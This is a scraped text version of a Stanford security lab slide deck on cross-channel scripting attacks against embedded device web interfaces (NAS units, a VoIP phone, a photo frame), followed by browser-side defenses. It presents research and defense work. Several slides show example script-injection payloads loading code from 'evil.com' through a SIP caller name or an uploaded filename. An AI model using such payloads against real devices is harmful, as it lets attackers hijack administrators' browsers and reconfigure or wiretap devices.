cross channel scripting
play

Cross-Channel Scripting e t u p m Impact on Embedded Web - PowerPoint PPT Presentation

b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S Cross-channel scripting


  1. b a L y t i r u c e S r Cross-Channel Scripting e t u p m Impact on Embedded Web Interfaces o C d r o f Hristo Bojinov Elie Bursztein Dan Boneh n a Stanford Computer Security Lab t S

  2. Cross-channel scripting Vulnerable System Service A Service B State Protocol A Protocol B

  3. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  4. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  5. Cross-channel scripting Vulnerable System Injection Service A Service B State Protocol A Protocol A Protocol B e.g. iCal

  6. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP

  7. Cross-channel scripting Vulnerable System Injection Execution Service A Service B State Protocol A Protocol A Protocol B Protocol B e.g. iCal e.g. HTTP XCS: a pervasive attack class ‣ secure services ≠ secure system

  8. Cross-channel scripting LaCie Ethernet disk mini ‣ Share access control ‣ Web interface ‣ Public FTP

  9. Cross-channel scripting FTP server NAS Upload a file: <script>..</script>.pdf Attacker

  10. Cross-channel scripting FTP file server system NAS Upload a file: <script>..</script>.pdf Attacker

  11. Cross-channel scripting FTP file Web server system App NAS Upload a file: Reflect the filename: <script>..</script>.pdf <script>..</script>.pdf Attacker Admin Browser Admin Browser

  12. Cross-channel scripting

  13. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities

  14. Talk overview Part 1: Many examples of XCS ‣ Phones: 5 XCS vulnerabilities in 2 phones ‣ Embedded: 23 devices, 26 XCS vulnerabilities ‣ RESTful APIs: 2 major APIs, 2 XCS vulnerabilities Part 2: Defenses against XCS

  15. More XCS Examples e c u r i t y L a b n f o r d C o m p u t e r S S t a

  16. Embedded web interfaces?

  17. Embedded vs. public web servers Growth 300 Internet Embedded (NAS and photo frame only) 225 ) s n o 150 i l l i M ( 75 0 2008 2009 2010 2011 2012 2013 Data : - Parks associates - Netcraft

  18. Web management interfaces Managing embedded devices via a web interface: ✓ Easier for users ✓ Cheaper for vendors

  19. Recipe for a disaster Vendors build their own web applications Standard web server (sometimes) ‣ Custom web application stack ‣ Weak web security ‣ New features/services added at a fast pace Vendors compete on number of services in product ‣ Interactions between services ➽ vulnerabilities ‣

  20. Outcome Vulnerabilities in every device we audited

  21. SIP XCS VoIP phone ‣ Linksys SPA942 ‣ Web interface ‣ SIP support ‣ Call logs

  22. SIP XCS

  23. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>”

  24. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface

  25. SIP XCS 1 Attacker makes a call as “<script src="//evil.com/"></script>” 2 Administrator accesses web interface Internet 3 Payload executes

  26. SIP XCS Outcome: phone reconfiguration, VoIP wiretapping...

  27. Photo frame XCS WiFi photo frame ‣ Samsung SPF85V ‣ RSS / URL feed ‣ Windows Live ‣ WMV / AVI

  28. Photo frame XCS Internet

  29. Photo frame XCS 1 Attacker infects via CSRF Internet

  30. Photo frame XCS 1 Attacker infects via CSRF Internet 2 User connects to manage

  31. Photo frame XCS 1 Attacker infects via CSRF Internet Frame Error! 3 Payload executes Call Support: 1-900-PWNED 2 User connects to manage

  32. Devices as stepping stones

  33. Devices as stepping stones 1 Administer the device

  34. Devices as stepping stones 1 Administer the device 2 Browse internet Internet

  35. Devices as stepping stones 1 Administer the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  36. Devices as stepping stones 4 Infect the device 2 Browse internet Internet P O S T ( e . g . v i a A d s ) 3 T r i g g e r

  37. Devices as stepping stones 5 Access files

  38. Devices as stepping stones 6 Send malicious payload 5 Access files

  39. Devices as stepping stones 6 Send malicious payload 5 Access files 7 Attack local network

  40. Another boring NAS device? SOHO NAS ‣ Buffalo LS-CHL ‣ BitTorrent support!

  41. Massive exploitation Internet

  42. Massive exploitation Create a bad torrent Internet Famous_movie.torrent

  43. Massive exploitation Internet

  44. Massive exploitation Internet

  45. Massive exploitation Internet

  46. Peer-to-peer XCS!

  47. Defenses e c u r i t y L a b n f o r d C o m p u t e r S S t a

  48. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B

  49. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult

  50. Cross-channel scripting Vulnerable System Injection Execution Service A Service B Protocol A Protocol A Protocol B Protocol B Difficult Feasible

  51. Security policies in browsers

  52. Security policies in browsers Strict Transport Security ‣ ForceHTTPS [JB’08] ‣ Stateful, and site-wide ‣ Recently adopted by PayPal ‣ Several browser implementations

  53. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide

  54. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained

  55. Security policies in browsers Same Origin Mutual Approval [OWvOS’08] ‣ Manifest delivery, stateless, site-wide Mozilla Content Security Policy ‣ Header delivery, stateless, fine-grained SiteFirewall ‣ Header delivery, stateful, site-wide

  56. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  57. SiteFirewall SiteFirewall (a Firefox extension), prevents internal websites from accessing the Internet. Internet

  58. SiteFirewall Injected script can issue requests at will: <script src=”http://evil.com”> Before

  59. SiteFirewall Page interactions with the Internet blocked. After

  60. Thinking beyond cookies

  61. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs

  62. Thinking beyond cookies Policy delivery mechanisms: ‣ Manifest files, cookies, custom headers, DNS, certs Different types of browser state: ‣ Cookies for web application state ‣ Policy store for web site security policies

  63. Conclusion e c u r i t y L a b n f o r d C o m p u t e r S S t a

  64. A growing threat As seen on Twitter...

  65. A growing threat ... and a smartphone near you.

  66. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Thanks to Eric Lovett and Parks Associates!

  67. Conclusion Rise of multi-protocol devices: XCS Rise of browser-OS: 24x7 exploitability Recommendations ‣ HTTP: cross-site policy standard ‣ Browser: security policy store (non-cookie) Thanks to Eric Lovett and Parks Associates!

  68. Questions? b a L y t i r u c e S r e t u p m o C d r o f n a t S http://seclab.stanford.edu

Recommend


More recommend